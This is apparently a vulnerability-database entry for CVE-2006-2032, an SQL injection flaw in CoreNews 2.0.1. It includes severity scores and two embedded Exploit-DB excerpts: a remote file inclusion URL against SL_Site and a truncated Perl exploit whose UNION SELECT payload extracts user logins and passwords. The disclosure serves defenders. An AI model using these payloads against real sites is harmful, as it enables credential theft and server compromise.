CVE-2006-2032
published 2006-04-26CVE-2006-2032: Multiple SQL injection vulnerabilities in Core CoreNews 2.0.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) icon_id and (2)…
PriorityP335medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
1.22%
64.8th percentile
Multiple SQL injection vulnerabilities in Core CoreNews 2.0.1 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) icon_id and (2) userid parameters in preview.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| corenews | corenews | <= 2.0.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SL_Site 1.0 - 'spaw_root' Remote File Inclusion
exploitdb·2006-09-07
CVE-2006-5291 SL_Site 1.0 - 'spaw_root' Remote File Inclusion
SL_Site 1.0 - 'spaw_root' Remote File Inclusion
---
SL_Site <= 1.0 [spaw_root] Remote File Include Vulnerability
Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://RST-CREW.net :
Remote : Yes
Critical Level : Dangerous
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : SL_Site
version : 1.0
URL : ftp://ftp1.comscripts.com/PHP/2032_slsite-10.zip
Exploit:
~~~~~
Variable $spaw_root not sanitized.When register_globals=on an attacker ca
n exploit this vulnerability with a simple php injection script.
# http://site.com/[path]/admin/editeur/spaw_control.class.php?spaw_root=[Evil_Script]
Solution :
~~~~~~~
declare variabel $spaw_root
Shoutz:
~~~
# Special greetz to my good friend [Oo]
# To all members of #h4cky0u and RST [ hTTp://RST-CREW.net ]
*/
Conta
Exploit-DB
CoreNews 2.0.1 - 'userid' SQL Injection
exploitdb·2006-04-21
CVE-2006-2032 CoreNews 2.0.1 - 'userid' SQL Injection
CoreNews 2.0.1 - 'userid' SQL Injection
---
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=24
#Usage: corenews.pl
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-24\r\n";
print "- CoreNews \r\n";
print "- -> Victim's host ex: www.victim.com\r\n";
print "- -> Path to CoreNews ex: /corenews/\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$cnserver = $ARGV[0];
$cnserver =~ s/(http:\/\/)//eg;
$cnhost = "http://".$cnserver;
$cndir = $ARGV[1];
$cnport = "80";
$cntar = "preview.php?userid=";
$cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,nu
No writeups or analysis indexed.
http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/045372.htmlhttp://securityreason.com/securityalert/797http://www.nukedx.com/?getxpl=24http://www.securityfocus.com/archive/1/431761/100/0/threadedhttp://www.securityfocus.com/bid/17655https://exchange.xforce.ibmcloud.com/vulnerabilities/25977http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/045372.htmlhttp://securityreason.com/securityalert/797http://www.nukedx.com/?getxpl=24http://www.securityfocus.com/archive/1/431761/100/0/threadedhttp://www.securityfocus.com/bid/17655https://exchange.xforce.ibmcloud.com/vulnerabilities/25977
2006-04-26
Published